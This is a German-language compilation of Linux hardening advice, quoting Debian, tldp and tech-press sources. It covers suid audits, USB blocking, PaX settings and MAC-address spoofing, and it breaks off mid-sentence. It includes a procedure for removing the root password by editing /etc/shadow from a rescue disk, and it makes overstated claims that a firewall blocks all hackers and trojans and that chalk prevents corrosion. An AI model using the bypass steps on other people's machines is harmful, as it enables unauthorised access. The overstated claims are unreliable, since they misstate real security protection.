Sichern Sie xorg.conf vorher. Außerdem sollte man natürlich auch (täglich) Logs überwachen (z.B. mit logwatch) wie auch die letzten Logins in /var/log/lastlog Mit Hilfe des Befehls lastlog lässt sich der Inhalt von /var/log/lastlog in ein angenehm lesbares Format umleiten. https://www.stefanux.de/wiki/doku.php/linux/hardening Dienste sollten nicht als root laufen (oder höchstens als root starten und dann die Privilegien abgeben bzw. den eigentlichen Dienst unter einem eingeschränkten Benutzer laufen lassen)! unnötige Dienste abschalten (Verringerung der Angriffsfläche): Auf offene Ports überprüfen netstat -lnptu Internetsuperserver veralteter inetd noch nötig? xinetd sicher konfigurieren (gefährdete) Dienste absichern: nur auf einer bestimmten IP lauschen, auf andere Ports wechseln evtl. Port-knocking einsetzen (Beispiel SSH) Bind mit chroot sicheren FTP-Server einsetzen: vsftp oder pure-ftpd unsichere Dienste nicht für kritische Aufgaben (Login) zulassen: FTP Telnet veraltete r-Dienste (rsh, rlogin, …) nur notwendige Benutzerkonten einrichten regelmäßig die Passwörter der Benutzer auf unsichere Passwörter überprüfen leere Passwörter nicht erlauben Kernel absichern eigenen (minimalen) Kernel bauen Integritätschecker, z.B. tripwire als cronjob laufen lassen. Die Signaturen sollten auf einem sicheren Drittsystem gelagert werden bzw. read-only gemountet sein (z. B. auf einer CD oder Diskette mit Schreibschutz) Die Benutzung von Shadow ist meist schon aktiviert (shadowconfig on) Protokolle (Logfiles) sichern: Loghost einrichten oder Logfiles absichern: Mit Secure Logging von Core-Wisdom können Sie Logfiles auch in mySQL-Datenbanken ablegen oder per Fingerabdruck gegen Veränderung sichern. msyslogd oder logrotate → Log per mail regelmäßig nach suid-Programme suchen: automatisch mit Programmen: sxid schickt eine tägliche Report über dazugekommene suid/sgid per mail zu manuell: root-suids: find / -perm -4000 2>/dev/null allgemein suids: find / -perm +6000 sgid-programme: find / -perm -2000 2>/dev/null volle Ausgabe mit allen Rechten bekommt man mit: ls -lad --full-time ´find / -perm +6000´ Banner (Versionsnummern etc.) von Diensten abschalten in /etc/motd die Kernelversion nicht anzeigen lassen, stattdessen Warnungen für Angreifer SSH: Im Sourcecode Webserver: Logfiles studieren Monitoring betreiben Quelle: https://www.stefanux.de/wiki/doku.php/linux/hardening SVGA SVGAlib-Programme laufen meist unter SUID-root, um Zugriff auf sämtliche Video-Hardware zu haben. Das macht sie so gefährlich. Sollten sie crashen, bleibt nur der Neustart des Systems, die Konsole zurückzu gewinnen. SVGA-Programme sollten daher nur unter Wahrung der Authentizität laufen. Besser ist, sie überhaupt nicht zu starten. Quelle: http://www.tldp.org/HOWTO/Security-HOWTO/password-security.html#AEN698 GGI (Generic-Graphics-Schittstellen-Projekt) Das Linux-GGI-Projekt versucht, zahlreiche Probleme von Linux mit dem Video-Interface zu lösen. GGI bewegt kleine Teile vom Video-Code in den Linux-Kernel, um Zugriffskontrolle über das Video-System zu gewinnen. Das bedeutet, CGI ermöglicht, zu jeder Zeit die Konsole wieder in einen guten Zustand zu bringen. Ebenso erlaubt ist ein sicherer sogenannter Attention-key, so dass kein trojanisches Login-Programm auf der Konsole l&aum;uft. http://synergy.caltech.edu/~ggi/ Quelle: http://www.tldp.org/HOWTO/Security-HOWTO/password-security.html#AEN698 Verbiete das Aufspüren von USB-Speicherstiften ( empfohlen für Firmen etc. ) Es passiert doch immer wieder: Benutzer schließen USB-Speicherstifte an, um Daten zu stehlen. Erzeuge eine Datei ´/etc/modprobe.d/no-usb´ und füge folgende Zeile hinzu, keine USB-Stifte mehr aufzuspüren: install usb-storage /bin/true https://www.tecmint.com/linux-server-hardening-security-tips/ Verbiete USB/firewire/thunderbolt-Geräte echo ";install usb-storage /bin/true" >> /etc/modprobe.d/disable-usb-storage.conf echo "blacklist firewire-core" >> /etc/modprobe.d/firewire.conf echo ";blacklist thunderbolt" >> /etc/modprobe.d/thunderbolt.conf Benutzer können nun keine sensitiven Daten auf USB-Geräte und keine Malware, Virusse und Backdoors mehr auf das Linux-System kopieren. https://www.cyberciti.biz/tips/linux-security.html SSL v2, v3, Ende-zu-Ende, TLS v1.1, v1.2, ..., md5, sha128, sha256, twofish, blowfish, Rijdal, ... Das sollten Sie über Verschlüsselung wissen (FAQ), PC-WELT, 03.01.2018 RSA und AES, Public und Private Key etc. Was steckt hinter diesen Verschlüsselungs-Begriffen? Eine FAQ. https://www.pcwelt.de/ratgeber/Das-sollten-Sie-ueber-Verschluesselung-wissen-FAQ-PGP-AES-SSL-und-Co.-9848740.html Einbruchsversuche in Fritzbox-Menü aufdecken, PC-WELT.de, 19.04.2021 Um die Sicherheit Ihres Routers und des Heimnetzes zu prüfen, lohnt von Zeit zu Zeit ein Blick in das Log-Verzeichnis der Fritzbox. Sie müssen sich auch keine Sorgen machen, wenn diese Meldungen auf einmal gehäuft auftauchen: Sie stammen von Bots und automatischen Angriffsprogrammen. Diese versuchen sich zum Beispiel mit gängigen Benutzernamen wie root, admin, Fernwartung am Fritzbox-Menü anzumelden. Oft setzen sie als Benutzernamen auch erfundene oder aus anderen Hacks erbeutete E-Mail-Adressen ein. https://www.pcwelt.de/tipps/Einbruchsversuche-in-Fritzbox-Menue-aufdecken-11007603.html Sichern Sie Ihr eigenes Wi-Fi-Netzwerk, PC-WELT.de, 03.01.2018 Heim- und kleine Firmennetzwerk-Router sowie Access Points (APs) werden in aller Regel einmal eingerichtet und dann sich selbst überlassen. Es lohnt sich aber, eine halbe Stunde Zeit zu investieren, um potenzielle Sicherheitslücken in Ihrem Netzwerk ausfindig zu machen und sie zu stopfen. Da Wireless-Signale in alle Richtungen ausstrahlen, sollten Sie eine sichere Verschlüsselungsmethode auswählen, um Spione und Datendiebe auszusperren. Sicherheitslücken in älteren Sicherheitsprotokollen wie WEP bedeuten, dass diese in wenigen Minuten ausgehebelt werden können. Auch wenn die meisten neuen Router mittlerweile WEP gegen WPA oder WPA2 getauscht haben, sollten Sie insbesondere bei älteren Modellen diesen Status überprüfen. Auch WPA gilt heutzutage nicht mehr als sicher, denn es setzt auf das unsichere TKIP-Verschlüsselungs-Protokoll. Achten Sie also unbedingt darauf, dass Ihr Router mit WPA2 und AES-Verschlüsselung arbeitet. Unterstützt Ihr Router diese Sicherheitsmechanismen nicht, wird es Zeit für einen Gerätewechsel. Router-Grundlagen: 5 Tipps zur optimalen Einrichtung Aus Gründen der Bequemlichkeit wird für Heim- und kleine Firmennetzwerke meist ein statisches Passwort für die Verschlüsselung übermittelter Daten benutzt. Das macht es Hackern aber leicht, das Netzwerk gewaltsam zu betreten. Genau genommen gibt es sogar verschiedenste Software-Lösungen, die Hackern genau das ermöglichen. Die Komplexität eines Passworts spielt dabei gar nicht die größte Rolle, sondern vielmehr die Zeichenlänge. Mindestens 20 Zeichen sollte ein sicheres Passwort umfassen - je länger es ist, desto schwieriger wird es zu knacken. Auch gebräuchliche SSIDs wie "Home", "WLAN" oder "WLAN-Netzwerk" sollten Sie in etwas Einzigartiges ändern. Denn WPA/WPA2 benutzt die SSID als Bestandteil für den Verschlüsselungs-Passcode. Das Befolgen unserer Tipps gibt natürlich keine Garantie dafür, dass Sie niemals ein Sicherheits-Debakel erleiden. Aber sie sind ein guter Anfang - und wer sie regelmäßig ausführt, bringt schon bald ein gutes Stück mehr PC-Sicherheit in seinen Alltag. Nicht das schlechteste in einer immer unsicherer werdenden Welt. https://www.pcwelt.de/ratgeber/5-schnelle-Tipps-fuer-Ihre-Datensicherheit-9985465.html Sperren Sie Ihren PC, PC-WELT.de, 03.01.2018 Viele wissen es, die wenigsten tun es: Man sollte seinen PC niemals verlassen, ohne vorher eine Sperre eingerichtet zu haben - insbesondere an semi-privaten Orten wie dem eigenen Arbeitsplatz. Wenn man davon ausgeht, dass die meisten Büroarbeiter als Admins in ihren PCs eingeloggt sind, dauert es nur wenige Sekunden, um Mal- oder Spyware darauf zu installieren, die geschickt sämtliche Antivirenscanner umgeht. https://www.pcwelt.de/ratgeber/5-schnelle-Tipps-fuer-Ihre-Datensicherheit-9985465.html Linux, KDE (4.4.4-OpenSuSE, mdv2010, CentOS 6, ...), Abmelden (Sitzung beenden), Benutzer wechseln, Ein-/Ausschalter, Neustart, Arbeitsfläche sperren, Ruhezustand und Tiefschlaf: systemsettings -> Anzeige -> Bildschirmschoner: nach X Minuten automatisch starten und nach Passwort fragen, um Bildschirmschoner zu beenden. Angleichung des Bildschirmschoners mit Screenlock: GL-Sonnenwind. systemsettings->Energieverwaltung -> Bildschirm nach Ruhezustand sperren und im aktivierten Profil: Reiter Bildschirm: Energiesparfunktionen für Bildschirm einschalten und Ausschalten nach Y (<X) Minuten ggfls. Programm caffeine zur Umgehung des Bildschirmschoners und -sperre in Systemabschnitt-Kontrollleiste (Systemtray) einstellen und aktivieren! Einen (warnenden) System-Banner erzeugen Eine Warnung zum Begrüßungstext nach dem Login kann abhalten, in den Server einzudringen /usr/lib/issue.net: Verfasse einen Text mit einer Warnung oder dergleichen. How to Spoof a MAC Address (eindeutige Hardware-Adresse der Ethernetkarte) Permanently "[...] A 48-bit MAC address (e.g., 08:4f:b5:05:56:a0) is a globally unique identifier associated with a physical network interface, which is assigned by a manufacturer of the corresponding network interface card. Higher 24 bits in a MAC address (also known as OUI or "Organizationally Unique Identifier") uniquely identify the organization which has issued the MAC address, so that there is no conflict among all existing MAC addresses. While a MAC address is a manufacturer-assigned hardware address, it can actually be modified by a user. This practice is often called "MAC address spoofing." In this tutorial, I am going to show how to spoof the MAC address of a network interface on Linux. Why Spoof a MAC Address? There could be several technical reasons you may want to change a MAC address. Some ISPs authenticate a subscriber´s Internet connection via the MAC address of their home router. Suppose your router is just broken in such a scenario. While your ISP re-establishes your Internet access with a new router, you could temporarily restore the Internet access by changing the MAC address of your computer to that of the broken router. Many DHCP servers lease IP addresses based on MAC addresses. Suppose for any reason you need to get a different IP address via DHCP than the current one you have. Then you could spoof your MAC address to get a new IP address via DHCP, instead of waiting for the current DHCP lease to expire who knows when. Technical reasons aside, there are also legitimate privacy and security reasons why you wish to hide your real MAC address. Unlike your layer-3 IP address which can change depending on the networks you are connected to, your MAC address can uniquely identify you wherever you go. Call me a paranoid, but you know what this means to your privacy. There is also an exploit known as piggybacking, where a hacker snoops on your MAC address on a public WiFi network, and attempts to impersonate you using your MAC address while you are away. [...] If you want to spoof your MAC address permanently across reboots, you can specify the spoofed MAC address in interface configuration files. For example, if you want to change the MAC address of eth0, do the following. On Fedora resp. CentOS or RHEL: nano /etc/sysconfig/network-scripts/ifcfg-eth0 DEVICE=eth0 MACADDR=00:00:00:00:00:01 Alternatively, you can create a custom startup script in /etc/NetworkManager/dispatcher.d as follows, especially if you are using Network Manager. I assume that you already installed macchanger. nano /etc/NetworkManager/dispatcher.d/000-changemac #!/bin/bash case "$2" in up) macchanger --mac=00:00:00:00:00:01 "$1" ;; esac ... oder macchanger -r "$1"" Quelle: https://xmodulo.com/spoof-mac-address-network-interface-linux.html Der Erfolg mit obigem Vorgehen hängt angeblich von der Hardware ab. Im Zweifelsfalle rufe "macchanger -r eth0" in einem Einwahlskript aus /usr/sbin oder /etc/sysconfig/network-scripts wie ifup oder ifup-eth weiter am Schluss nach der Einwahl auf oder manuell im Terminal nach der Einwahl. Eine Abfrage der gerade gesetzten MAC- bzw. Fake-MAC-Adresse kann dabei erfolgen mit macchanger -s eth0 oder ifconfig Mit ifconfig lässt sich die MAC-Adresse wie mit macchanger verändern. macchanger: Um nun eine neue MAC-Adresse wirksam einzurichten, sind nach Wahl einer der zufälligen aus "macchanger -r eth0" drei Veränderungen vorzunehmen: /etc/rc.local (Eintrag "macchanger --mac neue-MAC-Adresse eth0"), /etc/sysconfig/network-scripts/ifcfg-eth0 nochmaliger Eintrag der neuen MAC-Adresse und Ändern der damit verbundenen, neuen eigenen (lokalen) IP-Adresse in LINFW3 (Dialog -> NONYESNO -> own IP), ggfls. System-Neustart. Einstellungen in /etc/sysctl/network-scripts/ifcfg-eth0 DEVICE=eth0 # MACADRESS=.... BOOTPROTO=dhcp ONBOOT=no # automized dial-in during boot METRIC=5 MII_NOT_SUPPORTED=yes USERCTL=yes # users are allowed to change these data listed here and to dial-in DNS1=127.0.0.1 DNS2=203.13.81.14 RESOLV_MODS=yes LINK_DETECTION_DELAY=6 IPV6INIT=no IPV6TO4INIT=no ACCOUNTING=no DHCP_CLIENT=dhclient NEEDHOSTNAME=no PEERDNS=no PEERYP=no PEERNTPD=no Konfigurationsdatei des Resolvers Die Datei /etc/host.conf enthält spezielle Konfigurationsinformationen der Resolverbibliothek. Sie sollte je Zeile ein Konfigurations-Schlüsselwort enthalten, gefolgt von der entsprechenden Konfigurationsinformation. /etc/host.conf order hosts,bind multi on reorder on nospoof on spoofalert on Quelle: man host.conf NetworkManager-Konfiguration mit /etc/NetworkManager/NetworkManager.conf: [main] dns=none plugins=keyfile dhcp=dhclient rc-manager=unmanaged [ifupdown] managed=false [logging] level=error domains=none Weitere (sichere) Konfigurationsm&oum;glichkeiten des NetworkManagers mit NetworkManager.conf siehe https://developer.gnome.org/NetworkManager/1.11/NetworkManager.conf.html NIS deaktivieren Der Netzwerk-Informations-Service NIS sollte nicht benutzt werden, da er Passwort-Sharing erlaubt, eine hohe Unsicherheit..Alternativen sind LDAP. Sicheres finger Es gibt viele finger-Daemon, als besonders sicher gilt ffingerd. Hier kann die Anzahl der zur selben Zeit laufenden Prozesse und die Anzahl der darauf zugreifenden Hosts limitiert und das verfügbare Interface eingegrenzt werden. Sichere Nutzung von PCs unter Ubuntu (und andere, Anm., Gooken)- für kleine Unternehmen und Selbstständige v2.0 (PDF, 189KB, Datei ist barrierefrei⁄barrierearm), BSI, 01.08.2018 https://www.allianz-fuer-cybersicherheit.de/ACS/DE/_/downloads/BSI-CS_009.html Guidance EUD Security Guidance: Ubuntu 18.04 LTS Created: 24 Jul 2018 Updated: 24 Jul 2018 https://www.ncsc.gov.uk/guidance/eud-security-guidance-ubuntu-1804-lts paxctld von grsecurity.net (Aufruf paxctld in /etc/rc.local mit "paxctld -c /etc/paxctld.conf -d -p /var/run/paxctld" https://wiki.gentoo.org/wiki/Project:Hardened/PaX_Quickstart /etc/paxctld.conf (erlaubt ist s,r,p,m,E) e,E - https://pax.grsecurity.net/docs/emutramp.txt m,M - http://pax.grsecurity.net/docs/mprotect.txt p,P - http://pax.grsecurity.net/docs/pageexec.txt r,R - http://pax.grsecurity.net/docs/randmmap.txt s,S - http://pax.grsecurity.net/docs/segmexec.txt https://en.wikibooks.org/wiki/Grsecurity/Additional_Utilities #gdb /usr/bin/gdb srpm # steam # /usr/lib32/ld-linux.so.2 m # /usr/lib64/ld-linux.so.2 m # node # /usr/bin/node m # /usr/bin/perf m # firefox # /usr/lib64/firefox/firefox m # /usr/lib64/palemoon/palemoon m # tor-browser # /home/toruser/tor*/Browser/firefox m # /usr/lib64/thunderbird/thunderbird m # oxide /usr/lib/x86_64-linux-gnu/oxide-qt/oxide-renderer m # valgrind /usr/bin/valgrind m # python /usr/bin/python E /usr/bin/python2.6 E /usr/bin/python2.7 E /usr/bin/python3.2mu E # java # /usr/lib/jvm/java-6-sun-1.6.0.10/jre/bin/java m # /usr/lib/jvm/java-6-sun-1.6.0.10/jre/bin/javaws m # /usr/lib/jvm/java-6-openjdk/jre/bin/java m # /usr/lib/jvm/java-6-openjdk/jre/bin/java m # /usr/lib/jvm/java-8-openjdk/jre/bin/java m # /usr/lib/jvm/oracle-jdk-bin-1.8/bin/java m # /usr/lib/jvm/oracle-jdk-bin-1.8/jre/bin/java m # /usr/lib/jvm/zulu-8-amd64/bin/java m # openrc /lib/rc/bin/lsb2rcconf E # tuned # /usr/sbin/tuned m # libreoffice # Ubuntu doesn´t seem to carry this patch: # https://bz.apache.org/ooo/show_bug.cgi?id=80816 # libreoffice will still run fine without the below line, # but it will report an RWX mprotect attempt # /usr/lib/libreoffice/program/soffice.bin m Sperren der vituellen Konsolen außer voreingestelltes tty7 /etc/inittab, einkommentieren mit #: ... # Run gettys in standard runlevels #1:2345:respawn:/sbin/mingetty tty1 #2:2345:respawn:/sbin/mingetty tty2 #3:2345:respawn:/sbin/mingetty tty3 #4:2345:respawn:/sbin/mingetty tty4 #5:2345:respawn:/sbin/mingetty tty5 #6:2345:respawn:/sbin/mingetty tty6 ... Passwort vergessen und auf das System kann nicht mehr zugegriffen werden? Die nötigen Schritte, um wieder Zugriff erhalten, hängen davon ab, ob Sie die vorgeschlagene Prozedur zum Absichern von lilo und BIOS durchgeführt haben oder nicht. Wenn Sie beides eingeschränkt haben, müssen Sie im BIOS erlauben, von anderen Medien als der Festplatte zu booten, bevor Sie weitermachen können. Wenn Sie auch Ihr BIOS-Passwort vergessen haben, müssen Sie Ihr BIOS zurücksetzen. Dazu öffnen Sie das PC-Gehäuse und entfernen die BIOS-Batterie. Sobald Sie das Booten von CD-ROM oder Diskette eingeschaltet haben, sollten Sie Folgendes ausprobieren: Booten Sie von eine Rettungsdiskette und starten den Kernel. Wechseln Sie mit Alt+F2 auf eine virtuelle Konsole. Binden Sie die Partition ein, auf der sich Ihr /root befindet. Editieren Sie (auf der Rettungsdiskette von Debian 2.2 befindet sich ae, Debian 3.0 enthält nano-tiny, der vi ähnelt) die Datei /etc/shadow und ändern Sie die Zeile: root:asdfjl290341274075:XXXX:X:XXXX:X::: (X=irgendeine Ziffer) in Folgendes ändern: root::XXXX:X:XXXX:X::: Dies entfernt das vergessene Root-Passwort, das sich im ersten durch Doppelpunkte abgetrennten Feld nach dem Benutzernamen befand. Speichern Sie die Datei ab, starten Sie das System neu und melden Sie sich als Root mit einem leeren Passwort an. Dies wird funktionieren, außer wenn Sie Ihr System etwas sicherer eingestellt haben, d.h. wenn Sie nicht erlauben, dass Benutzer leere Passwörter haben, oder dass Root sich auf einer Konsole einloggen kann. https://www.debian.org/doc/manuals/securing-debian-howto/ch12.de.html Abhilfe: Verschlüsselung der Root-Partition (siehe unter System-Vollverschlüsselung (FSE)) Postfix - Verknappen der Information Setze in /etc/postifx/main.cf smtpd_banner = $myhostname ESMTP $mail_name (FreeBSD/GNU) Also ohne Versionsnummer und ggfls. mit neuem Namen für das Betriebssystem. https://www.debian.org/doc/manuals/securing-debian-howto/ch12.de.html Lifetime Hardware, Leiterbahnen: Gesicherter Kontakt auf Graphikkarten, Boards und Platinen Fast schrieben wir zu guter Letzt: Ins (Computer-)Gehäuse sollte ein Stück Kreide gelegt werden. Trick: Damit bleiben die Kontakte elektronischer Geräte wie an dieser Stelle Mainboard samt Graphikchip bzw. Graphikkarte immer rostfrei und vor Feuchtigkeit geschü,tzt! Löschen der Online-Konten bei Internet-Dienstanbietern Phishing, Spam, Profil-Erstellung (Profiling), Datenhandel, behördliche Ermittlungen, organsierte Kriminalität, Geheimdienste, Datenkraken, riesengroße Serverfarmen, Werbenetzwerke, Social Bots, KI, Hacks, Doxxing, Honeypots, Man-In-The-Middle-Angriffe, ...: Bevor wir mit der Installation von "Universal Linux 2010" bzw. dem Updaten voll loslegen, sei noch an eine Löschung (Austragung) so vieler registierter Online-Accounts wie einem sinnvoll erscheinen gedacht: Soziale Medien (Social Media), Google, paypal, Online Shopping, Online Banking, ... Oft gar nicht so einfach: Gegebenfalls bedarf es der Anleitung. Für weiterhin bestehende Konten nehme man online übers (Anmelde-)Portal erforderliche Sicherheitseinstellungen durch. Rundumschutz mit iptables-Firewall Linfw3 Im Laufe des Exkurs weiter unten steht Linfw3 als Download zur Verfügung. Mit Linfw3 lassen sich sämtliche Hacker und sämtliche Trojaner blocken, wird nur dem (gemeinsamen) Benutzer surfuser zur Gruppe surfgruppe der passwortgeschützte Online-Zugang ermöglicht, d.h. auch nicht Superuser root bzw. uid 0, d.h. nur von ihm (surfuser) zur Gruppe (surfgruppe) gestarten Prozessen. Die Zugriffsrechte sind entsprechend lokal auf den jeweiligen Benutzer hin auf <=700 zu setzen ( automatisch per umask 077 in /etc/fstab oder manuell mit chmod oder graphisch per Kontextmenü). Vom surfuser gestartete (eigene) Programme kommen so ungehindert spielend leicht ins Netz, die einfache Freigabe zugehöriger Ports in Linfw3 vorausgesetzt: ein entscheidender Vorteil. Der nä,chste entscheidende Vorteil: sämtliche Passwörter außer zum Entsperren der LUKS-verschlüsselten root-Partition können nicht mehr geknackt werden - selbst sollten andere sie kennen. Sie bleiben fortan irrelevant. Die einzige Gefahr stellt dann nur noch das Chrooten dar, die die Einstellungen in msec wie "Verbiete Zugang für Root", "Verbiete Fremdzugriff für root/Verbiete Chrooten" und/oder Sandbox firejail zur Sperrung der Konsolen gezielt entgegnen. Auch lassen sich die Shells aller Benutzerkonten außer surfuser, aber einschließlich Superuser root (mit Setzung auf /sbin/nologin) völlig unzugänglich machen oder alle Benutzerkonten außer surfuser, aber einschließlich root, geschlossen sperren (in msec_gui oder per Befehl). ACL-Zugriffsrechte (Abfrage mit getfacl, Setzen mit setfacl) können das Starten von Prozessen durch vom surfuser gestartete Prozesse im Rahmen einer firejail umlagernden Zugriffsrechts-Sandbox auf paranoide Art zusätzlich entschieden begrenzen. Chroot ist Bestandteil von ssh, rsh, sftp und mount usw., mount von cryptsetup (LUKS). Daher verhilft außerdem System-Vollerschlüsselung (aller Partitionen einschließlich der Root-Partition) mit LUKS/dm-crypt. Für das Blocken von Skripten auf aufgebauten (geöffneten) Netz-Verbindungen sorgen dann Linfw3 durch Blocken von Root (uid0, gid 0) unter Benutzer surfuser der Gruppe surfgruppe und Firefox-Erweiterungen (Firefox-Extensions) wie von uns, Gooken, höchst wirksam konfiguriertes ABP, wer will zuzüglich noscript und unbedingt RequestPolicyBlockedContinued bzw. Firefox >= 64 mit entsprechendem Cross-Site-Tracking-, -Scripting- und generellem Tracking-Schutz. Nebenbei kann noch der Port-Scan-Detektor psad oder iptables-gestützt psd über Linfw3 gezielt vorbeugen: unschlagbar paranoid! Um noch paranoider als paranoid zu werden, macht darüber hinaus die Begrenzung der interaktiven Prozesskommunikation (MAC) von sich manch reden - wir meinen unnötiger Weise und raten zum Verzicht. Restrisiko liefern alles in allem dann nur noch die von root getarteten Kernel-Prozesse aus dem Hause Linus Tovalds - obwohl sie unter root (uid 0 und gid 0) laufend auf umsagte Art durch Linfw3 gleich mit geblockt werden können. Der hier wohl einzig gefährlich wirkende (zeitweise recht ausgelastete) root-Prozess X (X-Server, darunter der Grafikkartentreiber) wurde ja in vorausgehenden Punkten bereits mit dem Befehl xhost durch Setzen eigener ACL entschieden restrirktriert. Der mit der Option "-no-listen tcp" gestartete X-Server (X) lässt sich wie dort beschrieben sogar im Benutzermodus starten. Auf weitere Eigenschaften von Linfw3, Firejail, ACL-Zugriffsrechte, umsagte Firefox-Erweiterungen, den in einer eigenen Sandbox laufenden Tor-Browser, TorDNS auf Basis des lokalen Cache-DNS pdnsd unter Einbezug lokaler /etc/hosts und weitere Einzelheiten dieses Prinzips kommen wir später (weiter unten) noch zu sprechen. Secure Programming HOWTO, David A. Wheeler, 2015-09-19 This book provides a set of design and implementation guidelines for writing secure programs. Such programs include application programs used as viewers of remote data, web applications (including CGI scripts), network servers, and setuid/setgid programs. Specific guidelines for C, C++, Java, Perl, PHP, Python, Tcl, and Ada95 are included. It especially covers Linux and Unix based systems, but much of its material applies to any system. For a current version of the book, see http://www.dwheeler.com/secure-programs https://dwheeler.com/secure-programs/Secure-Programs-HOWTO/index.html Sicheres "Universal Linux 2010" (backported System), Folgendes ist zu tun: Noch so verschiedene Linux-Distributionen umfassen, wie die zunehmende Installation von Paketen erweist, ein und dasselbe Linux, zum einen das weiterentwickelte Linux, zum anderen das dem Backporten folgende. Dabei teilen Pakete sich in rpm-paketgestützte, deb-Debian-Distributionen und Tarballs von Slackware auf. Ihr "Zusammenpuzzeln" verstöszlig;t also nicht gegen den Gedanken an dieses ein und dasselbe Linux. Als wichtig erweist sich bei der Auswahl infragekommender Distributionen noch der architektonische Gedanke an Vollständigkeit (generell aller möglichen verfügbaren Software), Fehlerfreiheit (Sicherheit) und Aktualität. U.a. folgende Möglichkeiten bieten sich an: Entweder Sie installieren mit Ablauf der Updates jedesmal, möglicherweise alljährlich, eine aktuelle Linux-Distribution, wir empfehlen in erster Linie Debian Linux bzw. GNU Debian oder Debian Ubuntu gefolgt von SuSE Linux, Fedora Core (fc), das daraus sorgsam hervorgehende und (Fedora Core -) backportete ("zurück-portierte") Redhat oder dem weitgehend gleichkommendes CentOS, Rosa, Openmandriva (omv), PCWelt Ubuntu und Mint, oder Sie installieren von fr2.rpmfind.net und pkgs.org wie gesagt die bereits mit am meisten Software, darunter viele Top-Games auf Basis von OpenGL und SDL umfassende und stabil laufende Linux-Distribution Mandriva mdv2010.0 bzw. mdv2011, mga1, mga2 oder mga3, rosa (Rosalabs.ru), omv (OpenMandriva) oder eine nahezu beliebige rpm-basierte Distribution der letzten Jahre und besorgen sich ihr zugehörige Updates von pkgs.org und fr2.rpmfind.net. Imfalle mdv2010.0 erwägen Sie nach möglichst vollständiger Installation und Updaten außerdem die Installation der Code noch einmal optimierenden (geupdateten) Autumn- und Spring-Version mdv2010.1 und mdv2010.2 ( 65 GB, 15 DVD + 11 DVD Quellpakete ), darauf aufbauend die Updates von CentOS und EPEL (el6 und el7), ferner das Mandriva-Nachfolgeprodukt omv2015 von pkgs.org für den Erhalt eines fast alle Anforderungen erfüllenden universellen Linux. Universal-Linux mit Kernel: kernel-4.14 (pclos, November 2018), glibc (el8, mga6, pclos), dracut (mga6, el6, mdv2011) und KDE (el7, el6 oder im Mix aus kde (mdv2010.2, 4.4.5/4.4.9, November/2011), kde (el6, 4.3.5, aktuell, 2018) und kde (4.4.4, OpenSuSE, Ende 2013) Nach der Installation des kernel-4.19 (pclos) gehe noch seinen Anforderungen nach und installiere davon noch nicht erfüllte wie kmod (pclos): "rpm -qi --requires kernel-4.19....". Um Fehlermeldungen beim Booten zu umgehen, verlangt glibc (el8) nur noch die Entfernung der Zeile LC_TIME=de_DE.UTF-8 aus /etc/sysconfig/i18n ! Gegebenenfalls sind noch die locales (pclos, mga7, mga6) nachzuinstallieren. PCLinuxOS bzw. pclos, ein Backport-System von Fedora Core, Almaxlinux, ROSA, Mageia und Mandriva, bietet dabei z.B. von https://ftp.nluug.nl/ftp/pub/os/Linux/distr/pclinuxos/pclinuxos/ oder http://ftp.pbone.net/mirror/www.pclinuxos.com/pclinuxos/apt/pclinuxos/64bit/RPMS.x86_64/ den aktuellen, sicheren Kernel mit aktueller Kernel-Firmware zum Download an. Wie empfehlen LONGTERMED kernel-4.14 bis kernel-4.14.12 oder höher mit kernel-firmware (pclos) und kernel-firmware-extra (pclos) und Konqueror (el6) mit integriertem Werbeblocker bzw. aktuellen Firefox (ESR, Extended Security Release bzw. die Backport-Unternehmens-Version) von http://ftp.scientificlinux.org/linux/scientific/6.9/x86_64/updates/security/ oder http://mirror.centos.org/centos/6/updates/x86_64/Packages/ mit im Folgenden noch aufgeführten Erweiterungen und AddOns. Das aus Updates von mdv2010.1 hervorgehende Universal-Linux stützt hauptsächlich auf CentOS 6 (und auf Wunsch auch CentOS 7), denn CentOS liefert für außergewöhnlich lange Zeit Updates auf dem sicheren Backport-Konzept: Vor dem Installieren und beim Updaten sollte nicht die Paketversion (mit ihren Erweiterungen) sondern der sich in diesem Fall über 10 Jahre erstreckende Updatezeitraum sowie das Release immer möglichst derselben (fixierten) Paketversionen den entscheidenden Ausschlag für eine bestimmte Distribution bzw. zum Updaten geben. Einzelheiten ü,ber den entscheidenden Vorzug der Update-"Komponente" CentOS können der Sektion zum Updaten "Universal-Linux" entnommen werden. SuSE: Suse Doc: Deployment Guide - Backporting Source Code SUSE uses backports extensively. The information in this section helps you understand, why it can be deceptive to compare version numbers in order to judge ... www.suse.com/documentation/sled11/book_sle_deployment/data/sec_update_backports.html Debian: Debian richtet neues Backports-Repositorium ein - Pro-Linux Mit dem neuen Repositorium "lenny-backports-sloppy" stehen Debian-Anwendern künftig aktualisierte Programme ohne große Risiken und Mühen zur Verfügung. www.pro-linux.de/news/1/16241/debian-richtet-neues-backports-repositorium-ein.html Bereits mdv2010.1 (mdv2010.0, Update von mdv2010.0 auf mdv2010.1 und schließlich mdv2010.2) läuft stabil und weitgehend sicher. Mit Fedora Project bzw. CentOS 6 (bzw. el6) und CentOS 7 (bzw. el7) hat Linux darüber hinaus endlich aufgehört, mit jeder neu erscheinenden Distribution nach Ablauf der Versorgung mit Updates riesige Müllberge an Paketen zu hinterlassen. Die Besonderheit von mdv2010 begleitet von CentOS liegt in der Funktionstüchtigkeit (in den meisten Fällen der Maßstab für Sicherheit schlechthin) infolge der jahrzehntelangen Durchgepatchtheit oft derselben jeweiligen Paketversion, dessen Release durch die Zahl hinter dem Punkt am Ende des Paketnamens genannt ist. Sie, eine ganz bestimmte Version eines Releases, wird also auf Sicherheit und Funktonstüchtigkeit hin regelrecht fixiert und für weitere Releases (Patches) mehr als zehn Jahre hindurch fortlaufend "festgenagelt". Selbst mdk10.1 aus dem Jahr 2004 bewahrt auf diese Art und Weise manch Aktualität. "Fedora Project bzw. CentOS ist binärkompatibel zu RHEL und daher ebenfalls ein Enterprise-Betriebssystem, also ein Betriebssystem, das auf die Bedürfnisse großer Unternehmen und staatlicher Organisationen ausgerichtet ist. Als Enterprise-Betriebssystem ist es deshalb auf Stabilität und lange Wartungszyklen ausgelegt. Man kann CentOS bis zu zehn Jahre nutzen, ohne Pakete bzw. Softwareversionen migrieren zu müssen, weshalb es für den kommerziellen Einsatz geeignet ist. Für RHEL bieten große Softwarehäuser wie Oracle oder SAP Zertifikate an, die garantieren, dass deren Software auf RHEL problemlos funktioniert, was analog für große Hardwarehersteller gilt. Enterprise-Betriebssysteme findet man daher meist auf Workstations und Servern, wo ein extrem stabiler Betrieb verlangt wird z. B. in der Wissenschaft, Forschung, Börse, Militär oder Raumfahrt. Im Gegensatz zu 